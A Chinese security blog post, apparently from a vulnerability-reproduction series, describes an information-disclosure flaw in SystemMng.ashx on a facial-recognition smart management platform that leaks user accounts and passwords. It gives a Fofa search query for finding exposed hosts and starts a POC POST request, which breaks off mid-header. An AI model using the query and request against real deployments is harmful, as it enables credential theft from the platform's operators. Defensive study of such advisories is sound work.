【漏洞复现】脸爱云一脸通智慧管理平台SystemMng信息泄露漏洞

晚风不及你ღ

已于 2024-04-24 17:03:59 修改

阅读量185

点赞数

文章标签： web安全

于 2024-04-24 16:42:42 首次发布

本文链接：https://blog.youkuaiyun.com/qq_37113223/article/details/138163313

版权

【漏洞复现】专栏收录该内容

150 篇文章

已下架不支持订阅

深圳市优卡特电子有限公司的脸爱云一脸通智慧管理平台存在SystemMng.ashx信息泄露问题，攻击者能通过特定搜索语法获取用户账号和密码等敏感数据。漏洞复现包括Fofa-Query的使用以及漏洞POC和复现结果的展示。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞描述：

深圳市优卡特电子有限公司脸爱云一脸通智慧管理平台SystemMng.ashx存在信息泄露漏洞，攻击者可以通过此漏洞获取当前系统用户账号及密码等敏感信息。

搜索语法:

Fofa-Query: body="View/UserReserved/UserReservedTest.aspx"

漏洞详情：

1.脸爱云一脸通智慧管理平台。

2.漏洞POC：

POST /SystemMng.ashx HTTP/1.1
Host: {
  {Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Length: 91
Accept: application/json, text/javascript, */*; q=0.01
Acce

了解本专栏